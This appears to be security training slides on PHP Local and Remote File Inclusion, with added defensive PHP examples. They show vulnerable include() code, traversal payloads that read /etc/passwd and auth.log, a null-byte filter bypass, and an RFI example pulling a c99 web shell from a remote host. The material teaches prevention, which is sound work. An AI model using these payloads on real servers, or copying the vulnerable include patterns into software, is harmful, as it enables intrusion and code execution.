6. #Local File Inclusion
Local File Inclusion (LFI) is the inclusion of a file from the
server's own filesystem through a parameter the browser controls.
It occurs when the value passed to a page include is not validated,
so directory traversal sequences (../) can be injected.
<?php
// Vulnerable: the request parameter is passed straight to include().
$page = $_GET["page"];
include($page);
?>
7. #Local File Inclusion
If the attacker sets page to "../../../../etc/passwd", the script
includes /etc/passwd and its contents are returned in the response.
Because include() evaluates PHP code, pointing it at a file the
attacker can write to (an upload, or a log file with injected PHP)
turns the file read into code execution.
Functions that lead to LFI when given unvalidated input
-include()
-include_once()
-require()
-require_once()
-fopen() (and file_get_contents(), readfile(): these only read the
file, so they give arbitrary file read rather than code execution)
9. #Local File Inclusion
<?php
if ($_GET["page"]) {
$file = $_GET["page"];
// Meant to strip a null byte and everything after it, but the pattern
// lacks a backslash, so it only matches the literal text "x00".
$file = preg_replace('/x00.*/', "", $file);
include($file);
}
?>
o In this case the filter does not remove the null byte, so a
null-byte terminator (%00) can be used. On PHP versions before
5.3.4, include() truncated the path at the null byte, which discards
any suffix such as ".php" that the script appends; since 5.3.4 a path
containing a null byte is rejected, but the traversal itself still works.
Eg: ?page=../../../../../../../../var/log/auth.log%00
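The following is an added example, not code from the original slides. It shows why the regex on the slide is a no-op against a null byte (it matches the literal characters "x00"), what the corrected pattern would do, and why stripping is still the wrong approach. The attacker input is constructed to mirror the ?page=...auth.log%00 request after URL decoding.

```php
<?php
// Added example: compare the slide's filter with a pattern that really
// matches a NUL byte. PHP receives a decoded %00 as a real "\0" character.

function stripNullSlide(string $path): string {
    // Pattern exactly as written on the slide: matches the text "x00".
    return preg_replace('/x00.*/', '', $path);
}

function stripNullFixed(string $path): string {
    // \x00 in PCRE is the NUL byte; removes it and everything after it.
    return preg_replace('/\x00.*/', '', $path);
}

// Constructed attacker input as PHP sees it after URL decoding of
// ?page=../../../../../../../../var/log/auth.log%00
$input = "../../../../../../../../var/log/auth.log\0";

var_dump(strpos(stripNullSlide($input), "\0") !== false); // bool(true): NUL survives
var_dump(strpos(stripNullFixed($input), "\0") !== false); // bool(false): NUL stripped
var_dump(stripNullFixed($input));                          // the traversal path is intact

// Why the NUL mattered: on PHP < 5.3.4, include($file . ".php") stopped
// reading the path at the NUL, so the appended ".php" was ignored.
// Since 5.3.4 include() refuses paths containing a NUL byte, but the
// traversal "../../../../" is untouched by either filter, so the right
// fix is to reject such input, not to strip characters from it.
```

Note that even the corrected pattern leaves "../../../../var/log/auth.log" behind; character stripping never makes a traversal safe.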
11. #Remote File Inclusion
RFI stands for Remote File Inclusion. It allows an attacker to make
the server include a file hosted on a server they control (for example
a web shell such as c99.php) instead of a file on the local filesystem.
The vulnerability exploits missing validation of the included path and
leads to code execution on the server; the included file can also emit
JavaScript to visitors, so it can be used for XSS-style attacks on the
site's users. In PHP it requires allow_url_include=On (Off by default
since PHP 5.2.0).
<?php
// Vulnerable: the parameter is concatenated into include() unchecked.
$file = $_GET['page'];
include($file . ".php");
// With ?page=http://Somesite/c99.php? this becomes
// include("http://Somesite/c99.php?.php"): the appended ".php" ends up in
// the query string and the remote script is fetched and executed.
?>
12. #Prevention
Do not pass user input directly into a file path.
Do not rely on str_replace('../', '', $_GET['file']): it makes a single
pass, so an input such as "....//" becomes "../" after stripping.
Prefer an allow-list that maps page names to known files.
If you definitely need dynamic path concatenation, accept only the
required characters such as "a-Z 0-9", reject "..", "/", "\" and
"%00" (null byte) and any other unexpected characters, and verify
with realpath() that the resolved path lies inside the intended
directory. Keep allow_url_include off so that remote URLs cannot be
included at all.
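The following is an added example, not code from the original slides. It demonstrates the str_replace bypass mentioned above and two safer patterns for the LFI and RFI cases: an allow-list of page names, and a character filter combined with a realpath() containment check. The page names, directory and temp-file setup are constructed for the demonstration.

```php
<?php
// Added example: why str_replace('../', '') fails, and two hardened resolvers.

// Single-pass stripping: removing "../" from "....//" leaves "../" behind.
function stripTraversal(string $path): string {
    return str_replace('../', '', $path);
}

// Pattern 1: map user input to a fixed set of known pages (hypothetical names);
// raw input never reaches the filesystem.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];
function resolveAllowlisted(string $page): ?string {
    return PAGES[$page] ?? null;   // null = unknown page, caller should 404
}

// Pattern 2: dynamic names restricted to [A-Za-z0-9_-], then verified with
// realpath() to lie inside $baseDir. The character check also rejects "://",
// so a remote URL (RFI) never gets near include().
function resolveContained(string $baseDir, string $page): ?string {
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $real === false) {
        return null;   // missing file or unresolvable directory
    }
    // Compare with a trailing separator so "/var/www/pages2" is not
    // accepted as being inside "/var/www/pages".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Demonstration with a constructed page directory in the system temp dir.
$baseDir = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . '/home.php', "<?php echo 'home';");

var_dump(stripTraversal('....//....//etc/passwd'));       // string "../../etc/passwd": bypassed
var_dump(resolveAllowlisted('../../etc/passwd'));         // NULL
var_dump(resolveContained($baseDir, '../../etc/passwd')); // NULL (fails the character check)
var_dump(resolveContained($baseDir, 'http://Somesite/c99.php?')); // NULL (RFI blocked)
var_dump(resolveContained($baseDir, 'home') === realpath($baseDir . '/home.php')); // bool(true)

unlink($baseDir . '/home.php');
rmdir($baseDir);
```

The allow-list is the better default: it needs no filesystem reasoning at all. The realpath() variant is for cases where pages really are created dynamically; note that it requires the target file to exist, so a missing page is reported as null rather than as a path that include() would then fail on.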